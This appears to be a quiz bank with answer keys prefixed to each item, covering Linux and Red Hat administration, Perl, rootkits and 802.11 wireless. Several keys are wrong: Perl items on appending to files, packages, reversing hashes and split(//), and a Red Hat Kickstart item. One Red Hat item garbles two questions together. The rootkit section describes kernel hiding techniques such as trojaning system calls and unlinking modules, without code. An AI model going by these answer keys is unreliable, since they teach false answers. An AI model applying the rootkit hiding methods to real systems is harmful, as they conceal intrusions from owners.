E#Linux Q49. You administer a system on which incremental backups are made between complete backups. To restore the system from the backups, in what order should you load the backups?	^A: The order does not matter as long as all of the backups are loaded	^B: Last complete backup, then each incremental backup from newest to oldest	^C: Each incremental backup from oldest to newest, then last complete backup	^D: Each incremental backup from newest to oldest then last complete backup	^E: Last complete backup, then each incremental backup from oldest to newest
C#Linux Q50. On a system using shadowed passwords, the correct permissions for /etc/passwd are _______ and the correct permissions for /etc/shadow are ______. 	^A: -rw-r-----, -r--------	^B: -rw-r--r--, -r--r--r--	^C: -rw-r--r--, -r--------	^D: -rw-r--rw-, -r-----r--	^E: -rw-------, -r-------- 
E#Linux Q51. Which crontab entry could be used to set the system time at regular intervals?	^A: 1 0*** date $d $t $24	^B: 1 0*** settime $d $t $24	^C: 1 0*** date	^D: 1 0*** /usr/sbin/runcron date	^E: 1 0*** /usr/sbin/ntpdate ntp1.digex.net > /dev/null 2>&1 
E#Linux Q52. Of the ways listed, which is the best way to temporarily suspend a user's ability to interactively log in?	^A. Changing the user's UID	^B. Changing the user's password	^C. Changing the user's shell to /bin/false	^D. Removing the user's entry in /etc/passwd	^E. Placing the command logout in the user's profile
D#Linux Q53. The command cat > foo.bar redirects	^A: cat to foo.bar	^B: foo.bar to cat	^C: stdout to cat 	^D: stdin to foo.bar	^E: foo.bar stdout
E#Linux Q54. You have a hard disk, /dev/hdb, that has more than 1024 cylinders. What command line argument can be passed to allow the system to recognize the drive geometry correctly?	^A: /dev/hdb=+1024	^B: boot large drive	^C: hdb=H,S,C	^D: hdb=C,H,S 	^E: /dev/hdb=C,H,S
C#Linux Q3: How many spare server processes are required by Apache for the typical, low-to-moderate volume website?	^A: 1	^B: 50	^C: 10	^D: 200
D:Q4: You have a standard Apache web server installation and want to make it respond to requests on port 8088. To do this, what configuration file do you need to change?	^A: None. This is the default port.	^B: /etc/httpd/apache.conf	^C: /etc/httpd/ports.conf	^D: /etc/httpd/httpd.conf	^E: /etc/httpd/access.conf
E#Linux Q5: Some loadable kernel modules accept options at load time: This can be used to set interrupt or IO addresses, for example: The place to set these options is?	^A: /etc/conf.modules	^B: /etc/lilo.conf	^C: /boot/System.map	^D: /etc/sysconfig	^E: /boot/module-info
E#Linux Q6: You are having some trouble with a disk partition and you need to do maintenance on this partition but your users' home directories are on it and several are logged in. Which command would disconnect the users and allow you to safely execute maintenance tasks?	^A: telinit 1	^B: shutdown -r now	^C: killall -9 inetd	^D: /bin/netstop --maint	^E: /etc/rc.d/init.d/network stop
netstat#Linux Q7: What command will display the active connections and Unix domain sockets for a running Linux machine with networking configured? Type just the command to accomplish this.
uname-a#Linux Q8: Type in the command to list your current kernel version, including any switches.
/etc/nsswitch.conf#Linux Q9: Type in the name and full path to the network configuration file that defines the search order for name resolution.
.bash_profile#Linux Q10: A user wishes to modify his environment variable PATH. What file should you tell him to edit in his home directory? Give filename only, no path.
ps -au#Linux Q11: What command was typed in to produce the output shown below. The entries shown are the full output of the command, less the actual command. Type the command and the options to reproduce similar output.	^1:USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND	^2:root 394 0.0 0.0 1200 444 tty1 S 01:05 0:00 /sbin/getty 38400 tty1	^3:root 396 0.0 0.0 1200 444 tty3 S 01:05 0:00 /sbin/getty 38400 tty3	^4:root 397 0.0 0.0 1200 444 tty4 S 01:05 0:00 /sbin/getty 38400 tty4	^5:root 398 0.0 0.0 1200 444 tty5 S 01:05 0:00 /sbin/getty 38400 tty5	^6:root 399 0.0 0.0 1200 444 tty6 S 01:05 0:00 /sbin/getty 38400 tty6	^7:root 423 0.0 0.0 1200 444 tty2 S 01:06 0:00 /sbin/getty 38400 tty2	^8:root 426 0.2 0.3 2880 1964 pts/0 S 01:07 0:00 -bash
D#Linux Q12: On a Debian system, which of the following would build a boot disk?	^A: mkboot /dev/floppy	^B: make boot --device /dev/fd0 2.4.18-12	^C: mkboot --device /dev/fd0 2.4.18-12	^D: mkboot /boot/vmlinux-2.4.18-12	^E: mkbootdisk /boot/vmlinux-2.4.18-12
B# Perl Q1: Which of the following keywords is used to make an object reference?	^A)  Return	^B)  Bless	^C)  Package	^D)  Object 
C# Perl Q2: Which of the following describes the most accurate difference between the "my" and the "local" expression?	^A)  Using my operator variables make the entire script private.	^B)  Local expression is used to declare variables available called within the sub references when arrays or hashes are used as arguments.	^C)  My expression makes variables private so they can only be used in the current sub and not be passed onto other subs called from within the subroutines.	^D)  It allows the variable to be passed on to other subs called from within the subroutine. 
D# Perl Q3: Which one is the least effective method of reducing code errors?	^A)  Use -w switch and create pseudo code before you start.	^B)  Write reusable code and modular approach.	^C)  Declare and initialize variables.	^D)  Keep strings short and use the non strict pragma at all times. 
A# Perl Q4: What is the @ISA array used for?	^A)  It is used for inheritance wherein a class is said to share a relationship with the classes listed within the @ISA array.	^B)  It is to create relations between classes and methods.	^C)  It is to have reusable code in related classes.	^D)  It is to inherit classes among methods. 
A# Perl Q5: Which of the following is NOT a common Perl error?	^A)  print MYFILEHANDLE ("Perl makes my life easier."); $ INCORRECT	^B)  The == and the eq operators as well as numeric operators (== !=) and string operators(eq,ne) are used as same operators.	^C)  A block of code is not surrounded by braces ({ }).	^D)  An array operator (@) is used incorrectly in scalar context, such as @array[1] when it should be $array[1]. 
D# Perl Q6: How do you write to a file with the filehandle HANDLE?	^A)  write ( HANDLE, "< write something");	^B)  print ( HANDLE, "write something");	^C)  Write ( HANDLE "write something")	^D)  print ( HANDLE "write something"); 
A# Perl Q7: What are objects used for?	^A)  Makes scripts easier to use and maintain.	^B)  Provide labels for defined code.	^C)  Create package definition files.	^D)  Divide codes into smaller pieces. 
D# Perl Q8: How do you create a filehandle for appending?	^A)  append ( HANDLE, "write something");	^B)  print ( HANDLE, "< file.txt");	^C)  open ( HANDLE "+>write something");	^D)  open ( HANDLE "<file.txt"); 
C# Perl Q9: Which of the following statements is true?	^A)  Variable declared by my keyword is global in scope.	^B)  Variable declared by local keyword is only available to the subroutine from which they are declared.	^C)  Variable declared by my keyword is available to calling subroutines.	^D)  Variable declared by local keyword is available to subsequently called subroutines. 
C# Perl Q10: The task of Perl's package is to?	^A)  Label a program.	^B)  Encrypt.	^C)  Create new keyword.	^D)  Define a namespace for a block of code.
D# Perl Q11: Consider the following program code:^  @array = ( "Y", "W", "X");^  @array = sort (@array);^  unshift(@array, "Z");^  print($array[0]);^  What is the output of this code?	^A. W	^B. X	^C. Y	^D. Z
D# Perl Q12: Consider the following program code:^  $i = "15";^  LOOP: for(; $i < 25; $i++)^  {^  if ($i % 2)^  {^  next LOOP;^  }^  print("$i ");^  }^What is the result of executing this program code?	^A. The code will output the following: 15 2 4 6 8 10 12 14 16 18 20 22 24	^B. The code will output the following: 15 17 19 21 23 25	^C. The code will fail at line 2 because $i is not initialized.	^D. The code will output the following: 16 18 20 22 24
A# Perl Q13: Which of the following choices demonstrates the correct syntax to pass the argument $arg2 to the subroutine getpass?	^A. getpass($arg2);	^B. call &getpass($arg2);	^C. sub &getpass($arg2);	^D. call getpass($arg2);
B# Perl Q14: Consider the following program code:^  @array = ("ALPHA", "beta", "GaMmA");^  @array = sort (@array);^  print ("@array");^  What is the output of this code?	^A. beta GaMmA ALPHA	^B. ALPHA GaMmA beta	^C. ALPHA beta GaMmA	^D. beta ALPHA GaMmA
A# Perl Q15: Consider the following package definition:^  package Convert;^  Which one of the following statements should immediately follow the given package definition to create a valid module?	^A. 1;	^B. use;	^C. sub;	^D. module Convert
B# Perl Q17: Which one of the following statements will add the symbol table for a package into the including package's symbol table?	^A. include Package;	^B. require Exporter;	^C. require Package;	^D. export Package;
B# Perl Q18: Consider the following code:^  %chars = ("a", "100", "b", "90", "c", "80");^  Which one of the following choices will reverse the key/value pairing of the code?	^A. reverse(%chars);	^B. &chars = reverse(%chars);	^C. reverse(%chars) = &chars;	^D. invert(%chars);
C# Perl Q19: Consider the following command:^  perl runme.pl arg1 arg2 arg3^  Given this command issued on the command line, what is the value of @ARGV?	^A. arg1	^B. runme.pl	^C. arg1 arg2 arg3	^D. 2
D# Perl Q20: The file handle INPUT is associated with the file represented by $file. Which statement will close the file handle INPUT?	^A. close (INPUT, $file);	^B. close INPUT;	^C. INPUT(close, $file);	^D. close(INPUT);
D# Perl Q21: Given the following statement:^  for ($count=0; $count < 5; $count++) {print "$count "}^  What will be the output from the given statement?	^A. 1 2 3 4 5	^B. 5 10 15 20 25	^C. 1 2 3 4	^D. 0 1 2 3 4
D# Perl Q22: Consider the following program code:^  $var = 10;^  package Alpha;^  $var = 20;^  {^  package Beta;^  $var = 30;^  }^  package Gamma;^  $var = 40;^  {^  print $var;^  }^  What is the output of this code?	^A. 10	^B. 20	^C. 30	^D. 40
D# Perl Q23: Consider that a file named test.txt contains this line of text:^  One line of test text.^  What is the output of the following lines of code?^  $file = "test.txt";^  open (OUT, "<$file") || (die "cannot open $file: $!");^  seek(OUT, 15, 0);^  read(OUT, $buffer, 5);^  print $buffer . "\n";^  print tell(OUT);	^A. t text^   20	^B. t tex^   19	^C. t text^   19	^D. t tex^   20
D# Perl Q24: Consider the following code:^  %hashA = ("alpha", "beta", "gamma", "albpa");^  %hashA = reverse(%hashA);^  print $hashA{"alpha"};^  What is the result of executing this code?	^A. The code outputs the following:^   alpha	^B. The code outputs the following:^   beta	^C. The code outputs the following:^   gamma	^D. The code fails at line 3.
C# Perl Q25: Consider the following command:^  perl runme.pl arg1 arg2 arg3^  Given this command issued on the command line, what is the value of $#ARGV?	^A. 0	^B. 1	^C. 2	^D. 3
B# Perl Q26: Consider the following code:^  $_ = "New York";^  @array2 = split(//);^  What is the value of $array2[0] after this code is executed?	^A. ""	^B. "New"	^C. "NewYork"	^D. "N"
A# Perl Q27: Consider the following program code:^  $y = "1";^  $x = "2";^  $z = "3";^  do^  {^  print ("$y ");^  } while ($y eq "2");^  do^  {^  print ("$x ");^  } until ($x eq "2");^  print ("$z ");^  What is the result of executing this program code?	^A. The code will output the following:^   1 2 3	^B. The code will output the following:^   3	^C: The code will output the following: ^   3 2	^D. The code will output the following:^   3 2 1
B#RedHat Q1.What is the DirectoryIndex Apache configuration directive used for?	^A. Printing indexes of directories when they do not have an index.html file	^B. The default page to show when the user requests an index of a directory	^C. Directories to ignore	^D. Directories that have access restrictions
A,B#RedHat Q2.Samba is used for:	^A. Sharing resources from a Linux machine to a Windows machine	^B. Accessing resources from a Windows machine, for example mounting an SMB share on a Linux machine	^C. Perform password administration.	^D. Configure NFS shares.
D#RedHat Q3.Which of the following is a journaling filesystem?	^A. ext2	^B. vfat	^C. minix	^D. ext3
A#RedHat Q4.What option to dhcpd is used to specify a certain location for its configuration file?	^A. -cf	^B. -c	^C. -d	^D. -f
A#RedHat Q5.What DHCP server option is used to specify the DNS server to clients?	^A. domain-name-servers	^B. dns	^C. domain-name	^D. routers
B,C#RedHat Q6.In order to open up an SSH shell on a remote machine called 'tiger' using the login name of 'admin', what would be the proper command line for this?	^A. openssh -l admin tiger	^B. ssh -l admin tiger	^C. ssh admin@tiger	^D. sshd tiger admin
A#RedHat Q7.In order to allow the directory /share to be mounted by the host 'tiger' with read and write access, what must the export line look like?	^A. /share tiger(rw)	^B. tiger(rw) /share	^C. /share tiger	^D. /share tiger (rw)
A#RedHat Q8.Which of the following commands would transfer a local file called password.txt to a remote machine called 'tiger' via SCP , logging in as 'admin', and storing the file in /tmp?	^A. scp password.txt admin@tiger:/tmp	^B. scp password.txt tiger@admin:/tmp	^C. scp password.txt admin tiger /tmp	^D. ssh admin@tiger:/tmp
A#RedHat Q9.The first ethernet card on a system is:	^A. eth0	^B. etho0	^C. eth1	^D. hme0
A#RedHat Q10.You can find all of the services managed by xinetd by looking at which of the following file or directory?	^A. /etc/xinetd.d	^B. /etc/inetd.conf	^C. /etc/rc.d/init.d	^D. /etc/xinetd.conf
A#RedHat Q11.'serviceconf' can be used to control xinetd managed services.	^A. True	^B. False
A#RedHat Q12.What is the prefdm file used for?	^A. To specify the preferred X display manager to use	^B. To setup preferences for GNOME	^C. To do performance analysis of system CPU usage	^D. To perform profiling of C code
A#RedHat Q13.What is the difference between the DROP and REJECT targets in iptables?	^A. REJECT will send an error packet back to the source system, whereas DROP will not	^B. DROP will send an error packet back to the source system, whereas REJECT will not	^C. They are equivalent	^D. DROP is invalid, DENY must be used
A#RedHat Q14.Software RAID, such as the Linux MD driver, is dependent on CPU as opposed to hardware RAID, which is implemented on the interface controller itself.	^A. True	^B. False
B#RedHat Q15.In order to set the time zone to 'US/Eastern' via Kickstart, what must be in the Kickstart configuration file?	^A. tz US/Eastern	^B. timezone US/Eastern	^C. It is not possible to set time zone	^D. timeconfig US/Eastern
A#RedHat Q16.Where do the binaries for XFree86 reside?	^A. /usr/X11R6	^B. /etc	^C. /etc/X11	^D. /X11R6
A#RedHat Q17.Why might it be insecure to execute the command 'xhost +'?	^A. It enables anyone to connect to your X display	^B. It permits root access on your system	^C. It uses up resources on your system	^D. It allows anyone to rsh into your system
B#RedHat Q18.Which file contains the default system desktop environment?	^A. /etc/X11/XF86Config	^B. /etc/sysconfig/desktop	^C. /etc/sysctl.conf	^D. /etc/sysconfig/displaymanager
C#RedHat Q19.What is the proper boot command to use when performing a Kickstart installation from a floppy where configuration is on the floppy itself?	^A. linux ks=fd0	^B. linux ks	^C. linux ks=floppy	^D. linux ks=ks.cfg
B#RedHat Q20.In order to install all possible packages via a Kickstart installation, what must be in the Kickstart configuration file under the %packages section?	^A. @ All	^B. @ Everything	^C. @ Server	^D. @ GNOME
B#RedHat Q21.In which section of the Kickstart configuration file can post-installation commands be specified?	^A. %packages	^B. %postinstall	^C. %pre	^D. %post
B#RedHat Q22.Apache does not require root to start the server if using ports below 1024.	^A. True	^B. False
A#RedHat Q23.Given a floppy image file 'disk.img', what would be the command to mount this image under /mnt/floppy WITHOUT an actual floppy disk? mount -o loop disk.img /mnt/floppy Name based virtual hosts cannot be configured with SSL in Apache.	^A. True	^B. False
A#RedHat Q24.In order to define a Samba share that will have read and write access, what option must be specified for the share in /etc/samba/smb.conf?	^A. writable = yes	^B. rw	^C. rw = yes	^D. public = no
A#RedHat Q25.All times in the DHCP leases file are in which time zone?	^A. GMT	^B. The same time zone as the local system	^C. EST	^D. There are no times in the DHCP leases file
A#RedHat Q26.When using 'chkconfig', do changes to xinetd managed services take effect immediately?	^A. Yes	^B. No
B#RedHat Q27.What does the second field in the file /etc/auto.master refer to?	^A. The mount point	^B. The map file to be consulted	^C. Options	^D. A filesystem alias
D#RedHat Q28.What partition number always refers to the first logical partition?	^A. 0	^B. 4	^C. 1	^D. 5
B#RedHat Q29.The DNS tab of the Red Hat Network Administration Tool allows you to configure the BIND DNS server running on your local machine.	^A. True	^B. False
A#RedHat Q30.'ntsysv' is a program for doing which of the following?	^A. Configure which services are started at boot time	^B. Performing remote administration of Windows NT servers	^C. Accessing Windows NT filesystems	^D. Configuring the modem
A#RedHat Q31.What directory contains PAM configuration files?	^A. /etc/pam.d	^B. /etc/pam	^C. /lib/security	^D. /etc/pam.conf
A#RedHat Q32.What would be the correct option for iptables to specify the incoming network interface to be any Ethernet interfaces on your system?	^A. iptables -i eth+	^B. iptables -i eth*	^C. iptables -i ethernet	^D. iptables -int eth+
A#RedHat Q33.Both RAID level 0 and Linear RAID provide capacity equivalent to the amount of storage you have. In other words, there is no space reserved for parity or error checking. What, then, is the difference between RAID level 0 and Linear RAID?	^A. When using Linear RAID, data is not striped across drives.	^B. When using Linear RAID, data is striped across drives.	^C. RAID 0 provides some amount of error checking.	^D. Linear RAID provides some amount of redundancy.
D#RedHat Q34.In order to list all kernel settings with sysctl, how must this command be invoked?	^A. sysctl -w	^B. sysctl	^C. sysctl --all	^D. sysctl -a
D#RedHat Q35.Performance tuning of IDE hard drives can be done with which of the following commands?	^A. hdtune	^B. ideparm	^C. idetune	^D. hdparm
A#RedHat Q36.Red Hat Linux 7.3 provides a means to give options for loadable kernel modules via which of the following files?	^A. /etc/modules.conf	^B. /etc/sysctl.conf	^C. /etc/kernel.conf	^D. /etc/conf.modules
C#RedHat Q37.What must the 'network' line look like in a Kickstart configuration file in order to have the machine configured for DHCP?	^A. network --nodns	^B. network dhcp	^C. network --bootproto dhcp	^D. network --ip dhcp
A#RedHat Q38.Why is it not recommended to use DNS names in the Apache configuration file?	^A. Apache startup could misconfigure virtual hosts if DNS is unavailable	^B. DNS is very slow	^C. DNS is not supported	^D. Apache cannot perform DNS lookups
A#RedHat Q39.'smbclient' is an FTP-like file transfer program for accessing remote Samba or Windows shares. In order to access the share named 'files' on the remote host 'tiger', logging in as the username 'admin', what would be the proper command line for using smbclient?	^A. smbclient //tiger/files -U admin	^B. smbclient //admin@tiger/files	^C. smbclient tiger:/files -U admin	^D. smbclient -L tiger
A#RedHat Q40.If you have just configured DHCP, and the DHCP server fails to start, what could possibly be the reason?	^A. The dhcpd.leases file does not exist	^B. The dhcp user is not setup	^C. The root user does not have permission to bind to port 67	^D. The dhcrelay server is not running
A#RedHat Q41.OpenSSH can be used to encrypt displaying of remote X Window applications	^A. True	^B. False
A#RedHat Q42.Which of the following files specifies information on what is NFS shared from your system?	^A. /etc/exports	^B. /etc/dfs/dfstab	^C. /etc/fstab	^D. /etc/sharetab
A,B,C,D#RedHat Q43.Which of the following types of devices can the Red Hat Network Administration Tool configure?	^A. Ethernet	^B. ISDN	^C. modem	^D. Token Ring
A#RedHat Q44.What would be the correct way to run 'chkconfig' in order to find out if the 'sendmail' service is enabled or disabled?	^A. chkconfig --list sendmail	^B. chkconfig sendmail	^C. chkconfig sendmail check	^D. chkconfig sendmail on
B#RedHat Q45.The Linux firewalling capabilities ipchains and iptables can be used interchangeably.	^A. True	^B. False
A#RedHat Q46.In Red Hat Linux 7.3, booting rescue mode will attempt to find your root filesystem and mount it automatically.	^A. True	^B. False
B#RedHat Q47.XFree86 version 4 uses separate binaries for each type of video card.	^A. True	^B. False
B#RedHat Q48.When performing a floppy-based Kickstart installation, what is the filename for the Kickstart configuration file to put on the floppy?	^A. kick.cfg	^B. ks.cfg	^C. kix.cfg	^D. kickstart.cfg
B#RedHat Q49.In order to configure Kickstart to create a partition /dev/sda1 mounted on / that will use up the whole disk of /dev/sda, what line must be in the configuration file?	^A. partition / --ondisk sda --size 9999	^B. partition / --ondisk sda --size 1 --grow	^C. part / --ondisk sda --size 1 --grow	^D. fdisk / --ondisk sda --size 1 --grow
A#RedHat Q51.It is possible with Apache to specify your own error documents for HTTP error codes.	^A. True	^B. False
B#RedHat Q52.When using encrypted passwords in Samba, the UNIX system passwords are kept in sync with the Samba passwords.	^A. True	^B. False
A#RedHat Q53.What is the 'dhcrelay' program used for?	^A. It allows you to forward DHCP requests to another DHCP server	^B. It provides a way for testing your DHCP server	^C. Controlling the locally running DHCP server	^D. Restarting the DHCP server
D#RedHat Q54.What command would mount a remote NFS filesystem '/shared' on the host 'tiger' on the local machine to the directory /shared, using a read and write blocksize of 8192?	^A. mount tiger:/shared /shared	^B. mount -o read=8192,write=8192 tiger:/shared /shared	^C. mount -o rw=8192 tiger:/shared /shared	^D. mount -o rsize=8192,wsize=8192 tiger:/shared /shared
A,B#RedHat Q55.Which of the following commands would restart the autofs service?	^A. service autofs restart	^B. /etc/rc.d/init.d/autofs restart	^C. service autofs reload	^D. service autofs status
A,B#RedHat Q56.TCP Wrappers utilizes which of the following files?	^A. /etc/hosts.allow	^B. /etc/hosts.deny	^C. /etc/hosts	^D. /etc/securetty
A#RedHat Q57.What would be the correct option for iptables to specify the incoming network interface to be any Ethernet interfaces on your system?	^A. iptables -i eth+	^B. iptables -i eth*	^C. iptables -i ethernet	^D. iptables -int eth+
A#RedHat Q58.Which of the following commands would block all ICMP packets from the host 1.2.3.4 coming to your machine?	^A. iptables -A INPUT -s 1.2.3.4 -p icmp -j DROP	^B. iptables -A INPUT -s 1.2.3.4 -p icmp -j DENY	^C. iptables -A OUTPUT -s 1.2.3.4 -p icmp -j DENY	^D. iptables -A OUTPUT -s 1.2.3.4 -p icmp -j DROP
A#RedHat Q59.What command could be used to find out which package owns the file /etc/aliases?	^A. rpm -qf /etc/aliases	^B. rpm -qp /etc/aliases	^C. rpm -e /etc/aliases	^D. rpm -qil /etc/aliases
B#RedHat Q60.What is the main configuration file for XFree86 version 4?	^A. /etc/X11/XF86Config	^B. /etc/X11/XF86Config-4	^C. /usr/X11R6/bin/XFree86	^D. XF86_SVGA
A#RedHat Q61.Virtual consoles are which of the following type of devices?	^A. Character devices	^B. Block devices
A#RedHat Q62.Is it possible to execute the post-install section of a Kickstart configuration file with a different interpreter other than Bash?	^A. Yes	^B. No
A#RedHat Q63.What option must be specified in a directive in order to allow execution of CGI scripts in that directory?	^A. ExecCGI	^B. CGI	^C. Executable	^D. Includes
A#RedHat Q64.The Nautilus file manager can be used to browse Samba shares.	^A. True	^B. False
A#RedHat Q65.Using RSA or DSA key pairs in OpenSSH can provide the ability to login to remote machines without providing a password by using the ssh-agent program. What would be the command to generate a RSA key pair?	^A. ssh-keygen -t rsa	^B. ssh-makekey -t rsa	^C. ssh-agent -t rsa	^D. ssh -t rsa
B#RedHat Q66.Which software RAID levels can be used on /boot or a root filesystem containing /boot?	^A. 0	^B. 1	^C. 5
A#RedHat Q67.What are the programs gdm, kdm, and xdm for?	^A. They are X display managers used for authentication	^B. They are the window managers for different desktop environments	^C. They are console programs for configuring the X Window system	^D. They are user administration programs
A#RedHat Q68.What graphical program can be used to create a Kickstart configuration file?	^A. ksconfig	^B. kickconfig	^C. kickstart	^D. rpm
A#RedHat Q69.What is the /etc/sysctl.conf file used for?	^A. Making settings to /proc be permanent across reboots	^B. Providing remote administration to the machine	^C. Configuring password settings	^D. Configuring mail setup
C#RedHat Q70.If 'linux ks' was used as a boot argument for a Kickstart installation, the system will use DHCP to configure the network device and possibly retrieve the location of the Kickstart configuration file via the DHCP settings. ^  If there was no bootfile specified by your DHCP server, what file will the installation program look for? Note that in all answers below, IP is replaced with the IP address of the machine being installed.	^A. /IP-kickstart	^B. /kickstart/IP-ks.cfg	^C. /kickstart/IP-kickstart	^D. /IP-ks.cfg
A,B#RedHat Q71.Where does Apache log messages to?	^A. /var/log/httpd/access_log	^B. /var/log/httpd/error_log	^C. /var/log/access_log	^D. /var/log/error_log
A#RedHat Q72.The configuration file for the OpenSSH server is:	^A. /etc/ssh/sshd_config	^B. /etc/sshd_config	^C. /etc/ssh_ssh_config	^D. /etc/ssh_config
B#RedHat Q73.In order to set the time zone to 'US/Eastern' via Kickstart, what must be in the Kickstart configuration file?	^A. tz US/Eastern	^B. timezone US/Eastern	^C. It is not possible to set time zone	^D. timeconfig US/Eastern
B#RedHat Q74.Which of the following commands will list PCI devices?	^A. lsdevices	^B. lspci	^C. lsdev	^D. pcidev
A#RedHat Q75.The X Window system can run without a window manager.	^A. True	^B. False
C#RedHat Q76.When the initial ramdisk (initrd) image is created, the system determines which SCSI drivers to load in this image by looking in the module configuration file for a module referenced by which of the following strings?	^A. root_disk_driver	^B. scsi_adapter	^C. scsi_hostadapter	^D. root_driver
A,B#RedHat Q77.When booting from a Red Hat Linux CDROM and you would like to perform a Kickstart installation using a Kickstart configuration file ks.cfg located on a floppy disk, what would be the correct boot arguments to use?	^A. linux ks=floppy	^B. linux ks=hd:fd0/ks.cfg	^C. linux floppy	^D. linux ks=ks.cfg
A#RedHat Q78.Whenever /etc/exports is modified, the NFS service needs to be notified to reload its configuration file.	^A. True	^B. False
B#RedHat Q79.What is the maximum number of primary partitions you can have on a hard drive?	^A. 16	^B. 4	^C. 32	^D. 8
C#RedHat Q80.What command could be used to find all packages with the string 'mail' within the package name?	^A. find / -name '*mail*'	^B. rpm -qf /usr/bin/mail	^C. rpm -qa | grep mail	^D. locate mail
A#RedHat Q81.In order to use Kickstart with a configuration file on an NFS server using eth1 to access the network, what would be the proper boot command for this?	^A. linux ks=nfs:/ ksdevice=eth1	^B. linux ks	^C. linux ks=:/ ksdevice=eth1	^D. linux ks=nfs:/ dev=eth1
B#RedHat Q82.The DHCP server shipped with Red Hat Linux stores current lease information in which of the following files?	^A. /etc/dhcpd.leases	^B. /var/lib/dhcp/dhcpd.leases	^C. /etc/dhcp	^D. /etc/dhcpd.conf
A#RedHat Q83.In order to find out whether a certain type of hardware is supported by Red Hat Linux, where can you look?	^A. The Red Hat Hardware Compatibility List (HCL)	^B. /etc/devices	^C. The kernel boot messages	^D. The Red Hat installation disk
A#RedHat Q84.What is the difference between the 'required' and 'requisite' PAM control flags?	^A. When a 'requisite' module check fails, the user is notified immediately as opposed to after all module checks.	^B. When a 'required' module check fails, the user is notified immediately as opposed to after all module checks.	^C. They are equivalent	^D. When a 'requisite' module check fails, the failure is ignored
B,C,D#RedHat Q85.The /proc filesystem is:	^A. Stored on a hard drive	^B. A directory that has files that can be modified	^C. A directory that contains information on processes	^D. A virtual filesystem
A#RedHat Q86.When using the 'Low Security' setting in the GNOME Lokkit program, you will be able to mount remote NFS shares.	^A. True	^B. False
B#RedHat Q87.Windows 2000 will work with plaintext passwords by default so the 'encrypt password' option is not necessary for Samba shares.	^A. True	^B. False
B#RedHat Q88.Changes made with 'ntsysv' will take effect immediately.	^A. True	^B. False
Intercepts# Rootkits Q1: A rootkit is a tool that _________ kernel-mode software calls
alternate#Rootkits Q2: Instead of allowing commands to be processed normally by the Windows Kernel, rootkits provide an ________ response
Hacker Defender#Rootkits Q3: This is more of a 'blackhat' tool than a training example __________ . 
FU#Rootkits Q4: The __ rootkit can hide processes, elevate process privileges, fake out the Windows Event Viewer so that forensics is impossible, and even hide device drivers (NEW!) All this without any hooking. 
WinlogonHijack#Rootkits Q5: Injects a dll into winlogon.exe and hooks msgina.WlxLoggedOutSAS, logging every login in plaintext. 
NT rootkit#Rootkits Q6: The original and first public NT rootkit 
vanquish#Rootkits Q7: a DLL injection based Romanian rootkit that hides files, folders, registry entries and logs passwords
klister#Rootkits Q8: simple set of utilities for Windows 2000, designed to read the internal kernel data structures, in order to get reliable information about the system state (like list of all processes, including those "hidden" by rootkits, even by 'fu').
Patchfinder2#Rootkits Q9: implements Execution Path Analysis technique for Windows 2000 systems. EPA is intended to detect various kernel and DLL rootkits in the system. 
/proc#Rootkits Q10: In UNIX implementation, process information is mapped to directory in _____ file system.
/proc/net/tcp and /proc/net/udp#Rootkits Q11: Similar to process hiding, hiding a network connection can be done by preventing it from being logged inside the ______ and ______ files.
sys_read()#Rootkits Q12: The idea for a kernel rootkit is to trojan the _______.
sys_ioctl()#Rootkits Q13: To hide the sniffer is basically hiding the promiscuous flag of the network interface. The system call to Trojan in this case is _______ .
A#Rootkits Q14: The LKMs in the system are kept in a singly linked list. To hide the presence of an LKM rootkit, the LKM rootkit can	^A: remove it from the list	^B: rename the list	^C: delete the list	^D: add an entry to the list
EXPORT_NO_SYMBOLS#Rootkits Q15: Normally functions defined in the LKM will be exported so that other LKMs can use them. Hiding these symbols is necessary, and the macro that can be used is ____________. This will prevent any symbol from being exported.
D#Rootkits Q16: How can you communicate with a rootkit?	^A: just start SSHD	^B: the rootkit creates a listener program	^C: commands are received by ICMP	^D: kernel rootkits have to modify some system calls.
sys_execve()#Rootkits Q17: To Redirect File execution the kernel rootkit can replace the:________ Thus, whenever the system tries to execute the "login" program, it will be re-directed to execute the attacker's version of login program.
Host Hardening, Systems patch and update#Rootkits Q18: What is the best defense against rootkits? ____ _______, ______ ______ and ________ 
B	#Wlan4FE Q2 Which 802.11 standard is also referred to as Wi-Fi?		^A: 802.11a		^B: 802.11b		^C: 802.11c		^D: 802.11d		^E: 802.11e		
A	#Wlan4FE Q3 802.11a uses which of the following (Choose all that apply.)		^A: orthogonal frequency division multiplexing		^B: 2.4 GHz band..		^C: FHSS		^D: DSSS				
B,D	#Wlan4FE Q4 How can you send more data across the airwaves? (Choose two.)		^A: utilize lower band frequencies		^B: use more complex modulation		^C: use better filtering on the receiver		^D: use more frequency (wider bandwidth)				
2.4	#Wlan4FE Q5 802.11 works at the _________GHz band.												
infrastructure	#Wlan4FE Q6 The 802.11 networking framework in which devices communicate with each other by first going through an Access Point is known as ______________ mode.												
A,D	#Wlan4FE Q7 802.11b uses which of the following (Choose all that apply.)		^A: DSSS		^B: FHSS		^C: orthogonal frequency division multiplexing		^D: 2.4 GHz band				
frequency hopping spread spectrum	#Wlan4FE Q8 What does FHSS stand for?												
milliwatt	#Wlan4FE Q9 The designator dBm is a decibel referenced to a(n) _________.												
B	#Wlan4FE Q10 802.11 provides _________ Mbps transmission.		^A: 10		^B: 1 or 2		^C: 15		^D: 1 only		^E: 2 only		
B	#Wlan4FE Q11 Ad-hoc mode is also referred to as _________ mode.		^A: central		^B: peer-to-peer		^C: client server		^D: secured				
1	#Wlan4FE Q12 The value 0 dBm is equivalent to how many milliwatts?												
direct sequence spread spectrum	#Wlan4FE Q13 What does DSSS stand for?												
A	#Wlan4FE Q14 What acts as a communication hub for users of a wireless device to connect to a wired LAN?		^A: AP		^B: CSD		^C: ISSS		^D: DSS				
5.2	#Wlan4FE Q15 If an antenna is rated at 3 dBd, what is its rating in dBi?												
F	#Wlan4FE Q16 802.11a provides ________ Mbps transmission.		^A: 1 or 2		^B: 1 only		^C: 15		^D: 2 only		^E: 10		^F: 54
C	#Wlan4FE Q17 With Ad-Hoc mode you do not need to use an AP.		^A: False		^B: This is not always true; must be judged case by case		^C: True						
dipole	#Wlan4FE Q18 The designator dBd is a decibel referenced to a(n) __________.												
D	#Wlan4FE Q19 You have a two cell configuration. One cell's Access Point is configured utilizing channel 6. What is the best channel selection for the second cell's Access Point?		^A: Channel 4		^B: Channel 8		^C: Channel 9		^D: Channel 11				
extended	#Wlan4FE Q20 A/an _________ Service Set is a set of two or more BSSs that form a single subnetwork.												
